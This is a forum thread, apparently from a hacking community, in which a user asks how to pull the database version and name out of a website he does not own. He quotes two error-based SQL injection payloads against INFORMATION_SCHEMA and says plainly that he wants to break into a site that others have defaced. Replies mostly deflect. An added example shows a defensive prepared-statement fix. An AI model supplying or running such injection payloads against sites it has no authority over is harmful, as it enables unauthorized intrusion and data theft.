
SQL injection

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
Please help me, sir.
The site has only one column.
When I put union all select or union select 1, it showed:


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 419

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 440

when I put
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

or
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

It's the same output.
I can't get the version and database.
Please, how do I get the version and database?
Please comment the command. Ty
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
The mysql you are using is deprecated. Change all your queries to mysqli.
 

N1ghtmare

Forum Veteran
Established
Joined
Nov 14, 2015
Messages
3,015
I think the database it uses is an older version, which is why it behaves like that, or maybe you are confused about how many columns it really has.
 

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
The mysql you are using is deprecated. Change all your queries to mysqli.
Teach me, sir. I don't know how to use mysqli in a website.
I don't know where I'm going to put this:
<?php
// Builds the HTML table rows for a search over the `entries` table.
// $connect is the open mysqli connection; it is passed in because a
// function cannot see variables defined outside it.
function doSearch($connect) {
    $output = '';
    if(isset($_POST['search'])) {
        $searchq = $_POST['search'];
        // Keep only letters and digits before the value is placed in the query.
        $searchq = preg_replace("#[^0-9a-z]#i","",$searchq);
        $sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
        $query = mysqli_query($connect, $sql);
        // mysqli_query() returns false on failure; stop instead of passing false on.
        if($query === false) {
            return $output;
        }
        $count = mysqli_num_rows($query);
        if($count == 0) {
            $output = '<tr><td>No results found.</td></tr>';
        } else {
            while($row = mysqli_fetch_array($query)) {
                $eName = $row['name'];
                $eDesc = $row['description'];
                $eCont = $row['content'];
                $id = $row['id'];
                $elvl = $row['level'];
                $ehp = $row['hp'];

                $output .= '<tr><td><a href="You must register or login to view this.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
            }
        }
    }
    // Always return a string, even when no search was submitted.
    return $output;
}
That's just an example.
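
Added example, not part of the original posts and not the site's own code: the two warnings quoted in the first post appear when a failed query's `false` result is passed straight into `mysql_fetch_array()` and PHP prints the error to the visitor. This is one way a site owner could write such a lookup with mysqli, using a prepared statement, checked errors and no error output; the table `offres`, its columns, the `id` request parameter and the connection settings are hypothetical.

```php
<?php
// Added example; hypothetical names: table `offres`, columns `id` and
// `titre`, request parameter `id`, and the connection settings below.

// Log errors instead of printing them, so a failed query never shows
// file paths or line numbers to the visitor.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Make mysqli throw exceptions instead of quietly returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function findOffer(mysqli $db, $rawId)
{
    // Accept only a positive integer; reject anything else before
    // the database is touched.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The value is sent separately from the SQL text, so it cannot
    // change the structure of the statement.
    $stmt = $db->prepare('SELECT id, titre FROM offres WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($offerId, $titre);
    $row = $stmt->fetch() ? ['id' => $offerId, 'titre' => $titre] : null;
    $stmt->close();
    return $row;
}

try {
    $db = new mysqli('localhost', 'app_user', 'app_password', 'app_db');
    $db->set_charset('utf8mb4');
    $offer = findOffer($db, $_GET['id'] ?? '');
    if ($offer === null) {
        http_response_code(404);
        echo 'Offer not found.';
    } else {
        echo htmlspecialchars((string) $offer['titre'], ENT_QUOTES, 'UTF-8');
    }
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage()); // details go to the server log only
    http_response_code(500);
    echo 'An error occurred.';
}
```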
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
What are you planning to achieve? Is that your code, or just your example?
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
That code of yours is only for filtering.
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
That's just my example.


No, I'm just trying.
But I won't deface it, I'll just get in.
There are many sites like that, but others are able to get into them.
Get in? Are you going to copy their code or what?
 

That Poppy

Eternal Poster
Established
Joined
Sep 13, 2013
Messages
1,907
I want to hack the site too,
but I won't deface it.
All I need is the command to hack the website.
That's hard, especially if you're hacking big sites; those have security features.
 

Destroyers

Leecher
Joined
Aug 2, 2016
Messages
7
That's hard, especially if you're hacking big sites; those have security features.
So many people have already hacked the website I'm trying to hack.
I just find it funny because they're fighting over it. Every day the defaced page is different.
So I tried, but it won't work. I can't do it. I was hoping to get help! The other sites I've encountered are the same as that one, so if I find out how, the command is probably the same for the others.

kira111101, your name seems familiar. Are you COD3X?
 
